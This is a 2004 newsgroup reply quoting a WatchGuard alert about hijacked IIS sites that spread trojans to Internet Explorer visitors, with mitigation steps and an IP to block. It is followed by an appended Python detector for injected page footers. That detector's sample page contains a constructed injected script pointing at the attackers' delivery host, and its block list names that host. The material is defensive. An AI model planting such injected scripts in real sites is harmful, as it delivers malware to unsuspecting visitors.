Re: FYI WatchGuard Security Alert

From: steve h. (steve2470nonsense_at_nonsensemailblocks.com)
Date: 06/27/04


Date: Sat, 26 Jun 2004 22:25:35 GMT

Duane Arnold wrote:

> Some people may already know this.
>
> Duane :)
>
> <snip>
>
> Hijacked Web Sites Spread
> Trojans to IE Visitors
> Severity: High
> 25 June, 2004
>
> Summary:
>
> Yesterday, NetSec Inc warned of a large-scale attack they detected
> spreading from numerous Web sites (including popular destinations such as
> search engines, online price-comparison sites, auction sites, and
> financial institution sites) to unsuspecting Internet Explorer (IE)
> users. Apparently, hackers have hijacked some IIS Web servers and
> injected the sites' Web pages with malicious JavaScript code. The
> hijacked Web sites exploit an unpatched IE vulnerability, spreading a
> malicious Trojan to any IE user visiting the sites. The malicious Trojan
> can install a keystroke logger, set up a malicious proxy server, or
> install a back door, giving the attacker total control of the victim's
> machine. See the Solution section below to learn how to protect your
> users and your IIS server from this malware.
>
> Exposure:
> Late yesterday, NetSec Inc. warned that they were seeing some sort of
> malware spreading from IIS Web servers of certain public sites. Today, a
> few more details about this attack emerged. Hackers have apparently
> somehow corrupted many Web sites, including some very popular ones, and
> injected malicious JavaScript code into the document footer of all the
> hijacked Web sites' pages.
>
> If any IE user visits one of these infected Web sites, he triggers the
> malicious JavaScript code, which exploits an unpatched IE vulnerability
> (similar to the one described here). This causes the unsuspecting IE user
> to automatically download and install one of many malicious Trojans from
> a Russian site. Which specific Trojan the victim receives differs from
> case to case. Some of the Trojans install keystroke loggers, others
> install proxy servers, and some even backdoor your computer, allowing the
> attacker full access. AV vendors have named some of these Trojans Scob,
> Backdoor-AXJ and VBS/Psyme.
>
> As this issue develops, many details remain unknown, and as a result,
> much of the reporting is contradictory. The problem is complicated by the
> fact that it concerns two vulnerabilities: one in IIS, and one in IE. For
> now, experts still don't know exactly how the hackers gained control over
> the hijacked IIS servers. We still don't know whether the attackers
> manually hijacked each infected IIS server or if the IIS infection is
> spreading automatically via some undiscovered worm or attack bot. The IE
> vulnerability has no patch available, and according to some sources,
> Microsoft is not close to offering one. That means all IE users are at
> risk for the foreseeable future.
>
> Although this attack vector seems new, hackers used a similar attack
> method against a large Web hosting company called Interland in 2003.
>
> Solution Path:
> For IIS Administrators:
>
> Though no one really knows how the hijacked IIS servers first became
> infected by this malware, most experts suspect that the IIS servers were
> attacked using vulnerabilities corrected by Microsoft's MS04-011 security
> patch, described in our April 13 Vulnerability Alert. If you haven't
> already applied this patch, you should do so immediately. Administrators
> who applied this patch without rebooting report that they still remained
> vulnerable to attack, so make sure to reboot your server after applying
> the patch.
>
> Is your own IIS server infected? SANS's write-up on this attack lists
> symptoms to look for. You should verify that your server doesn't show any
> of these symptoms.
>
> For Internet Explorer Users:
>
> The infected Web servers use an unpatched IE exploit to deliver the
> malicious Trojan. All IE users are vulnerable to this attack except the
> few using the Windows XP SP2 Release Candidate 2.
>
> However, you can adjust some of IE's security settings to prevent this
> attack from succeeding. (Before you try any of the steps in this
> paragraph, read it completely, since this workaround may also hamper your
> experience at uninfected Web sites.) This attack uses JavaScript, so have
> all your IE users disable JavaScript in IE. To do so, click Tools =>
> Internet Options => Security tab. Highlight the "Internet" Zone and then
> click Custom Level. Scroll down to Scripting and disable both "Active
> Scripting" and "Scripting of Java Applets." Keep in mind, some legitimate
> sites use Java scripting and Active Scripting in order to work properly.
> For instance, an Outlook Web Access server uses Active Scripting to
> display mail to your users via a browser. If you encounter a legitimate
> site that you must allow your users to access, we recommend you add that
> site to the "Trusted Site" list in IE (also under Tools => Internet
> Options => Security tab). You can learn more about adjusting IE's
> security settings here.
>
> Many AV vendors have added signatures which detect this malicious HTML
> attack and the Trojans it delivers. We recommend you update your AV
> signatures to make sure you can detect and prevent these attacks.
>
> IE users should also make sure they are up-to-date with all IE patches.
> Visiting Windows Update is the easiest way to see if an individual PC is
> up to date.
>
> For WatchGuard Firebox III, X, SOHO, and Vclass Users:
> IIS Attack: Since the IIS infection vector remains unclear, we don't know
> if WatchGuard firewalls help. However, if the attackers use one of the
> vulnerabilities corrected by MS04-011, the attack likely uses one of
> Microsoft's NetBIOS ports (TCP or UDP 135, 137, 138, 139, 445). All
> WatchGuard firewalls block these ports by default.
>
> IE Trojan Download: Unfortunately, the IE flaw that allows a Trojan to
> automatically download to a victim computer looks like normal HTML, so
> you can't block it through your WatchGuard firewalls. However, in order
> to deliver the malicious Trojan, the current exploit code redirects your
> browser to IP address 217.107.218.147. Adding 217.107.218.147 to your
> Firebox Blocked Sites list helps prevent your users from downloading the
> malicious Trojans associated with this attack:
>
> Firebox SOHO. From the SOHO Web UI, click Blocked Sites under Firewall in
> the left hand navigator. Next to Host IP Address, type 217.107.218.147
> and press Add. Scroll to the bottom of the page and hit Submit.
> Firebox III/X. In Policy Manager, go to Setup => Intrusion Prevention =>
> Blocked Sites. Click Add, type 217.107.218.147 and hit OK twice.
> Firebox Vclass. In Vcontroller, click on System Configuration and then
> Blocked Sites. Click Add, type 217.107.218.147 and hit OK.
> Note that hackers this resourceful could change which server delivers the
> Trojans. Though it is wise to block 217.107.218.147, doing so is not
> necessarily a permanent solution to this problem.
>
> <snip>
btw, some of the sites I read specifically recommended using Mozilla,
etc. for a while
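A defender-side check for the footer-injection symptom the alert describes, written here as an added example (it is not code from the alert, WatchGuard or the poster): it flags script blocks appended after a page's closing </html> tag and reports whether they reference the delivery host the alert names. The sample pages are constructed, and the assumption that the injected "document footer" script lands after </html> is mine, not stated in the alert.

```python
import re
from ipaddress import ip_address

# Constructed sample pages. The script body is made up for illustration and
# is not the real injected code; only the IP comes from the alert.
INJECTED_PAGE = (
    "<html><body><h1>Price comparison</h1></body></html>\r\n"
    "<script language=javascript>"
    "window.open('http://217.107.218.147/EXAMPLE-PATH');</script>"
)
CLEAN_PAGE = "<html><body><h1>Price comparison</h1></body></html>\r\n"

# Host the alert tells Firebox admins to block; extend as new IoCs emerge.
BLOCKED_HOSTS = {"217.107.218.147"}

SCRIPT_RE = re.compile(r"<script\b.*?</script>", re.IGNORECASE | re.DOTALL)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def find_footer_scripts(html):
    """Return script blocks that appear after the final </html> tag.
    Assumption: footer injection shows up as trailing content past </html>."""
    end = html.lower().rfind("</html>")
    if end == -1:
        return []
    trailer = html[end + len("</html>"):]
    return SCRIPT_RE.findall(trailer)


def referenced_blocked_hosts(fragment):
    """IPv4 literals in the fragment that are on the block list."""
    found = set()
    for ip in IPV4_RE.findall(fragment):
        try:
            ip_address(ip)          # drop things like 999.1.1.1
        except ValueError:
            continue
        if ip in BLOCKED_HOSTS:
            found.add(ip)
    return found


def assess_page(html):
    """'clean': no trailing script; 'suspicious': trailing script present;
    'infected': trailing script reaches a known delivery host."""
    scripts = find_footer_scripts(html)
    if not scripts:
        return "clean"
    if any(referenced_blocked_hosts(s) for s in scripts):
        return "infected"
    return "suspicious"
```

Run it over a copy of the IIS web root (or over pages fetched from your own site) rather than trusting a single home page, since the alert says every page of a hijacked site carried the footer.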


